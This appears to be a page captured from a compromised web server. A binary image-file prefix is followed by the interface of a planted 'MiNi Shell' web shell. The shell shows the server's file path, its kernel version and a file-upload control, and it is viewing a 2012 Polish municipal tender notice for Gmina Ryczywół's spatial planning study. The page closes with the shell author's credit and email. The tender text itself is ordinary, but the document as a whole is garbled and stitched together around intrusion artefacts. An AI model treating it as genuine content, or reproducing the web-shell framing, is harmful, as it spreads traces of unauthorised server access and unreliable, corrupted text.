JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121120/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121120/460236-N-2012.html

<p class="kh_header"><b>Ryczywół: sporządzenie projektu studium uwarunkowań i kierunków zagospodarowania przestrzennego Gminy Ryczywół</b><br>
<b>Numer ogłoszenia: 460236 - 2012; data zamieszczenia: 20.11.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Ryczywół , ul. Mickiewicza 10, 64-630 Ryczywół, woj. wielkopolskie, tel. 0 67 283 70 02, 283 70 69, faks 067 283 70 02.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ryczywol.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> sporządzenie projektu studium uwarunkowań i kierunków zagospodarowania przestrzennego Gminy Ryczywół.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> I.	OPIS PRZEDMIOTU ZAMÓWIENIA:

1.	Nazwa przedmiotu zamówienia: sporządzenie projektu studium uwarunkowań i kierunków zagospodarowania przestrzennego Gminy Ryczywół.
2.	Przedmiotem uchwały Rady Gminy w Ryczywole nr XIX/138/2012 z dnia 29 sierpnia 2012 roku jest sporządzenie Studium uwarunkowań i kierunków zagospodarowania przestrzennego Gminy Ryczywół w celu określenia polityki przestrzennej gminy. Granica obszaru opracowania obejmuje cały obszar gminy. Powierzchnia opracowania wynosi: 154,5 km2.
3.	Zakres usługi:
1)	Opracowanie planistyczne musi obejmować wykonanie opracowania ekofizjograficznego, analiz tematycznych zgodnie z art. 10 ust 1 i 2 ustawy o planowaniu i zagospodarowaniu przestrzennym z 27 marca 2003 roku (Dz. U. z 2012 r., poz. 647)
2)	Wykonawca sporządzi:
a)	opracowanie ekofizjograficzne,
b)	tabelę wykazu wniosków złożonych do studium,
c)	projekt studium uwarunkowań i kierunków zagospodarowania przestrzennego gminy wraz z niezbędnymi opiniami i uzgodnieniami,
d)	prognozę oddziaływania na środowisko,
e)	projekty pism do instytucji, o których mowa w ustawie o planowaniu i zagospodarowaniu przestrzennym z prośbą o zaopiniowanie i uzgodnienie wraz z wykazem opinii i uzgodnień,
f)	projekty obwieszczenia, ogłoszenia i zawiadomienia o wyłożeniu projektu studium do publicznego wglądu wraz z wykazem uwag i rozstrzygnięciem wójta,
g)	propozycję rozstrzygnięć do złożonych uwag, 
h)	niezbędne poprawki wynikające z uwzględnienia uwag zgłoszonych w procedurze wyłożenia projektu studium do publicznego wglądu oraz ponowi procedurę w niezbędnym zakresie,
i)	dokumentację formalno - prawną z przebiegu procedury studium,
j)	uchwałę wraz z załącznikami (rysunek uwarunkowań i kierunków oraz tekst ustaleń studium i syntezę).
3)	Projekt Studium należy sporządzić zgodnie z ustawą o planowaniu i zagospodarowaniu przestrzennym z dnia 27 marca 2003 roku (Dz. U. z 2012 r., poz. 647) oraz Rozporządzeniem Ministra Infrastruktury z dnia 28 kwietnia 2004 r.w sprawie wymaganego zakresu projektu studium uwarunkowań i kierunków zagospodarowania przestrzennego gminy (Dz.U. 2004 nr 118 poz. 1233).
4)	Opracowanie planistyczne powinno składać się z:
a)	opracowania ekofizjograficznego - 2 egz. w wersji papierowej + wersja elektroniczna,
b)	rysunku/rysunków studium będących integralną częścią uchwały uchwalającej studium - w ilości niezbędnej do uzyskania opinii/ uzgodnień/wyłożenia do publicznego wglądu, przy czym Zamawiający w efekcie końcowym winien otrzymać 5 egz. rysunku Studium w skali 1: 25 000 oraz 1 egzemplarz w wersji elektronicznej (pdf lub jpg),
c)	tekstu studium (obejmujący uwarunkowania, kierunki i syntezę) w ilości niezbędnej do uzyskania opinii/ uzgodnień/wyłożenia do publicznego wglądu, przy czym Zamawiający w efekcie końcowym winien otrzymać 2 egz. tekstu studium w wersji papierowej oraz 1 egz. w wersji elektronicznej
d)	prognozy oddziaływania na środowisko - do uzyskania opinii/ uzgodnień/wyłożenia - 1 egz. w wersji papierowej, reszta na płycie CD (ilość odpowiednia do ilości instytucji opiniujących i uzgadniających), przy czym Zamawiający w efekcie końcowym winien otrzymać 2 egz. prognozy w wersji papierowej oraz 1 egz. w wersji elektronicznej,
e)	projektów dokumentów:
- propozycji rozstrzygnięcia wniosków złożonych do studium,
- pism do instytucji, o których mowa w ustawie o planowaniu i zagospodarowaniu przestrzennym z prośbą o zaopiniowanie i uzgodnienie wraz z wykazem opinii i uzgodnień,
- projekty obwieszczenia, ogłoszenia i zawiadomienia o wyłożeniu projektu studium do publicznego wglądu wraz z wykazem uwag i rozstrzygnięciem wójta,
- pism do instytucji, o których mowa w tiret drugie i trzecie w sytuacji ponowienia procedury w niezbędnym zakresie
5)	Inne obowiązki wykonawcy: Wykonawca:
a)	przedstawi wyniki analiz oraz wnioski (wraz z propozycją ich rozstrzygnięcia) do sporządzania projektu studium uwarunkowań i kierunków zagospodarowania przestrzennego gminy wraz z koncepcją Wójtowi Ryczywołu celem wyboru wariantu do ostatecznego sporządzania projektu Studium;
b)	przygotuje wykaz materiałów planistycznych, o których mowa w Rozporządzeniu Ministra Infrastruktury z dnia 28 kwietnia 2004 r. w sprawie wymaganego zakresu projektu studium uwarunkowań i kierunków zagospodarowania przestrzennego gminy;
c)	przedstawi projekt studium właściwej komisji urbanistyczno - architektonicznej celem uzyskania opinii;
d)	weźmie udział w publicznej dyskusji nad przyjętymi w projekcie studium rozwiązaniami, o której mowa w ustawie o planowaniu i zagospodarowaniu przestrzennym oraz sporządzi z niej protokół;
e)	przedstawi projekt studium właściwym komisjom Rady Gminy w Ryczywole przed terminem sesji uchwalającej studium;
f)	zaprezentuje projekt studium radnym podczas sesji Rady Gminy w Ryczywole;
g)	przygotuje dokumentację formalno - prawną z przebiegu procedury planistycznej sporządzania studium uwarunkowań i kierunków zagospodarowania przestrzennego gminy.
6)	Inne ustalenia:
a)	Zamawiający zapewni mapy topograficzne  w skali 1: 25 000 oraz mapy ewidencyjne.
b)	Zamawiający udostępni materiały wyjściowe takie jak: rejestr decyzji o warunkach zabudowy, rejestr decyzji o pozwoleniu na budowę, program ochrony środowiska, koncepcje dotyczące rozwoju infrastruktury i komunikacji itp.
4.	Szczegółowe informacje dotyczące realizacji przedmiotu zamówienia zostały opisane we Wzorze Umowy (Część III SIWZ).

II.	HARMONOGRAM RZECZOWO-TEMINOWY:

I etap - prace wstępne, wykaz wniosków do studium, wstępna koncepcja.
Termin - 5 miesięcy od przekazania przez Zamawiającego materiałów wyjściowych.
Przedmiot przekazania:
- tabela zawierająca wykaz wniosków do studium wraz z propozycją ich rozstrzygnięcia - 2 egz.
- koncepcja studium (część tekstowa i graficzna) - 1 egz. w wersji papierowej i 1 w wersji elektronicznej
- opracowanie ekofizjograficzne - 2 egz. w wersji papierowej + wersja elektroniczna,

II etap - opracowanie projektu studium.
Termin - 2 miesiące od otrzymania od zamawiającego pisemnej akceptacji koncepcji studium.
Przedmiot przekazania:
- projekt studium przygotowany do opiniowania i uzgadniania (tekst, rysunek, prognoza oddziaływania na środowisko) w ilości niezbędnej do uzyskania opinii/ uzgodnień na płytach CD oraz 1 komplet materiałów w wersji papierowej
- przygotowanie pism do instytucji, o których mowa w ustawie o planowaniu i zagospodarowaniu przestrzennym z prośbą o zaopiniowanie i uzgodnienie
	
III etap - wprowadzenie zmian wynikających z opiniowania i uzgadniania oraz przygotowanie do wyłożenia do publicznego wglądu.
Termin - 1 miesiąc od otrzymania od zamawiającego ostatniego pisma będącego opinią bądź uzgodnieniem.
Przedmiot przekazania:
- projekt studium przygotowany do wyłożenia do publicznego wglądu - w wersji elektronicznej i 1 egz. w wersji papierowej - tylko gdy zaistnieje potrzeba wprowadzenia zmian wynikających z opiniowania i uzgadniania
- wykaz opinii i uzgodnień
- projekty obwieszczenia, ogłoszenia i zawiadomienia o wyłożeniu projektu studium do publicznego wglądu

IV etap - wprowadzenie zmian wynikających z wyłożenia do publicznego wglądu i przygotowanie projektu studium do uchwalenia.
Termin - 1 miesiąc od otrzymania od zamawiającego ostatniej uwagi, bądź informacji, iż nie wpłynęła żadna uwaga.
Przedmiot przekazania:
- protokół z dyskusji publicznej
- propozycję rozstrzygnięcia uwag
- wykaz uwag
- projekt studium - tylko gdy zaistnieje potrzeba wprowadzenia zmian wynikających z wyłożenia
- listę nieuwzględnionych uwag

V etap - przygotowanie dokumentacji planistycznej, przekazanie studium Zleceniodawcy.
Termin - 1 miesiąc od uchwalenia przekazanie dokumentacji planistycznej dla studium, która zostanie wysłana Wojewodzie Wielkopolskiemu.
Przedmiot przekazania:
- dokumentacja planistyczna
- rysunki studium - 5 egz. w skali 1: 25 000 oraz 1 egzemplarz w wersji elektronicznej
- tekstu studium (obejmujący uwarunkowania, kierunki i syntezę) - 2 egz. tekstu studium w wersji papierowej oraz 1 egz. w wersji elektronicznej
- prognozy oddziaływania na środowisko - 2 egz. prognozy w wersji papierowej oraz 1 egz. w wersji elektronicznej..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.41.00.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 18.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia publicznego może ubiegać się Wykonawca, który dysponuje osobami zdolnymi do wykonania zamówienia tj.: dysponuje zespołem projektowym składającym się z minimum:
a)	1 Urbanisty - osoby posiadającej uprawnienia do wykonywania zawodu urbanisty, będącej jednocześnie członkiem izby urbanistów (lub równoważne kwalifikacje w rozumieniu przepisów europejskich), posiadającej doświadczenie polegające na udziale w sporządzaniu w okresie ostatnich 5 lat jednego studium lub zmiany studium uwarunkowań i kierunków zagospodarowania przestrzennego terenu obejmującego swoim zakresem powierzchnię całego miasta lub gminy, oraz jednego miejscowego planu zagospodarowania przestrzennego obejmującego swym zasięgiem co najmniej 350 ha miasta lub gminy,
b)	1 osoby posiadającej doświadczenie w sporządzaniu opracowania ekofizjograficznego oraz prognozy oddziaływania na środowisko.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia publicznego może ubiegać się Wykonawca, który spełnia warunek dotyczący sytuacji ekonomicznej i finansowej tj.: posiada ważne i opłacone ubezpieczenie odpowiedzialności cywilnej w zakresie prowadzenia działalności związanej z przedmiotem zamówienia na sumę gwarancyjną nie mniejszą niż 150 tyś. zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykonawca ponadto przedkłada:
1)	Formularz ofertowy (sporządzony według wzoru stanowiącego załącznik nr 1 IDW).
2)	Pełnomocnictwo do reprezentowania Wykonawcy w postępowaniu o zamówienie publiczne albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego (w przypadku składania oferty wspólnej lub gdy reprezentant Wykonawcy działa na podstawie pełnomocnictw).</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Istotne zmiany postanowień niniejszej umowy mogą nastąpić pisemnie pod rygorem nieważności, za zgodą obu stron, z zastrzeżeniem ust. 2.
2.	Zamawiający przewiduje możliwość istotnych zmian postanowień zawartej umowy w przypadku wystąpienia co najmniej jednej z okoliczności wymienionych poniżej, z uwzględnieniem podawanych warunków ich wprowadzenia:
1)	termin realizacji: 
a)	zmianie uległy przepisy prawne istotne dla realizacji przedmiotu umowy,
b)	z przyczyn niezależnych od Wykonawcy przedłużają się terminy procedur administracyjnych na etapie wydawania opinii, uzgodnień,
c)	nastąpiła niemożność rozpoczęcia realizacji umowy lub zaistniały przerwy w jej wykonaniu z przyczyn leżących po stronie Zamawiającego,
d)	działania osób trzecich uniemożliwiają wykonanie prac, które to działania nie są konsekwencją winy którejkolwiek ze stron umowy,
e)	w przypadku działania siły wyższej,
2)	wynagrodzenie (w tym również podatek VAT) - w następstwie zmiany przepisów prawnych,
3)	zmiana zakresu prac objętych umową:
a)	w razie zmiany przez Zamawiającego założeń do projektu wprowadzonych w trakcie jego przygotowywania lub realizacji, wynikających z konieczności sporządzenia zamiennych lub uzupełniających opracowań projektowych, 
b)	jeżeli konieczność wprowadzenia zmian jest skutkiem zmiany przepisów prawa. 
3.	Nie stanowi istotnej zmiany umowy:
1)	zmiana osób przy pomocy, których Wykonawca realizuje przedmiot umowy na inne osoby legitymujące się co najmniej równoważnymi uprawnieniami, 
2)	zmiana podwykonawców, których udział w realizacji przedmiotu umowy zaakceptował Zamawiający.
3)	zmiana danych związanych z obsługą administracyjno - organizacyjną umowy,
4)	zmiana danych teleadresowych, osób reprezentujących strony lub oznaczenia stron umowy - wynikających ze zmiany stanu faktycznego albo prawnego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ryczywol.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gmina Ryczywół
ul. Mickiewicza 10
64-630 Ryczywół.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.11.2012 godzina 13:30, miejsce: siedziba Zamawiającego - sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com